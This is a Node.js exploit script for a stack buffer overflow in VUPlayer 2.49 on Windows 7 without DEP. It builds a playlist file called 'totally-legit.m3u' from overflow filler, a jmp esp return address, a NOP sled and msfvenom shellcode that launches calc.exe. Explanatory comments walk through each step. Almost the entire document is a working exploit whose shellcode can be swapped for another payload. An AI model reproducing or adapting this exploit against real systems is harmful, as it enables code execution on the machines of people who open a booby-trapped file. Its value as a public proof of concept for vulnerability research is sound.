// Exploit Title: VUPlayer 2.49 - Windows 7 SP1 (no DEP) - .m3u buffer overflow
// Date: 04-02-2019
// Exploit Author: Alan Vivona
// Vendor Homepage: http://vuplayer.com/
// Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe
// Version: VUPlayer <=2.49
// Tested on: Windows 7 SP1 (no DEP)
const fs = require('fs')
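const fileName = 'totally-legit.m3u' // playlist file written to the current directory
const stackSize = 1012 // bytes of filler emitted before the saved return address is overwritten
const addressSize = 4 // 4 bytes == 1 address (32-bit target)
// Build a NOP sled of `length` bytes. 0x90 is the x86 NOP; 0xcc (the value the
// original comment named) is INT3, a debugger breakpoint, and must not be used
// here. Like String.prototype.repeat, a negative length throws RangeError.
const nopsled = (length) => '\x90'.repeat(length)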
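// Return the shellcode as a 220-byte 'binary' (latin1) string.
// Generated with:
//   msfvenom -a x86 --platform windows -p windows/exec CMD='calc.exe' -b '\x00\x09\x0a\x0d\x1a\x20' --format python
// The buffer is kept in a local: the original assigned to an undeclared `buf`,
// which in sloppy mode resolved to the module-level `buf` and reset it to ""
// as a side effect of calling payload().
const payload = () => {
  const chunks = [
    "\xdd\xc3\xba\xad\xd7\xf1\x1e\xd9\x74\x24\xf4\x5f\x31",
    "\xc9\xb1\x31\x31\x57\x18\x83\xef\xfc\x03\x57\xb9\x35",
    "\x04\xe2\x29\x3b\xe7\x1b\xa9\x5c\x61\xfe\x98\x5c\x15",
    "\x8a\x8a\x6c\x5d\xde\x26\x06\x33\xcb\xbd\x6a\x9c\xfc",
    "\x76\xc0\xfa\x33\x87\x79\x3e\x55\x0b\x80\x13\xb5\x32",
    "\x4b\x66\xb4\x73\xb6\x8b\xe4\x2c\xbc\x3e\x19\x59\x88",
    "\x82\x92\x11\x1c\x83\x47\xe1\x1f\xa2\xd9\x7a\x46\x64",
    "\xdb\xaf\xf2\x2d\xc3\xac\x3f\xe7\x78\x06\xcb\xf6\xa8",
    "\x57\x34\x54\x95\x58\xc7\xa4\xd1\x5e\x38\xd3\x2b\x9d",
    "\xc5\xe4\xef\xdc\x11\x60\xf4\x46\xd1\xd2\xd0\x77\x36",
    "\x84\x93\x7b\xf3\xc2\xfc\x9f\x02\x06\x77\x9b\x8f\xa9",
    "\x58\x2a\xcb\x8d\x7c\x77\x8f\xac\x25\xdd\x7e\xd0\x36",
    "\xbe\xdf\x74\x3c\x52\x0b\x05\x1f\x38\xca\x9b\x25\x0e",
    "\xcc\xa3\x25\x3e\xa5\x92\xae\xd1\xb2\x2a\x65\x96\x4d",
    "\x61\x24\xbe\xc5\x2c\xbc\x83\x8b\xce\x6a\xc7\xb5\x4c",
    "\x9f\xb7\x41\x4c\xea\xb2\x0e\xca\x06\xce\x1f\xbf\x28",
    "\x7d\x1f\xea\x4a\xe0\xb3\x76\xa3\x87\x33\x1c\xbb",
  ]
  return chunks.join('')
}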
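// Assemble the malformed playlist: filler up to the saved return address, the
// address of a `jmp esp` gadget, a short NOP sled, then the shellcode. As the
// header notes, this relies on DEP being off (stack must be executable) and on
// BASSWMA.dll loading at a fixed base; a non-executable stack or a rebased
// module would break the fixed address.
let buf = ''
// payload() is evaluated first: the published version assigned to the outer
// `buf` instead of a local, and the original only worked because `+=` reads
// its left operand before calling the right. Taking the value up front makes
// the layout independent of that evaluation-order detail.
const shellcode = payload()
buf = 'A'.repeat(stackSize) // overflow
// overrides EIP with Address : 0x1010539f => jmp esp
// found with immunity by issuing the command : !searchcode: jmp esp
// the address is on a PAGE_EXECUTE_READ at BASSWMA.dll
buf += "\x9f\x53\x10\x10"
buf += nopsled(addressSize * 4) // just in case, not mandatory
buf += shellcode
// 'binary' (latin1) writes each char as one byte. Report a failed write
// instead of printing "Done!" regardless of the callback's `err`.
fs.writeFile(`./${fileName}`, buf, 'binary', (err) => {
  if (err) {
    console.error(`Failed to write ${fileName}:`, err)
    process.exitCode = 1
    return
  }
  console.log(`Done! > ${fileName}`)
})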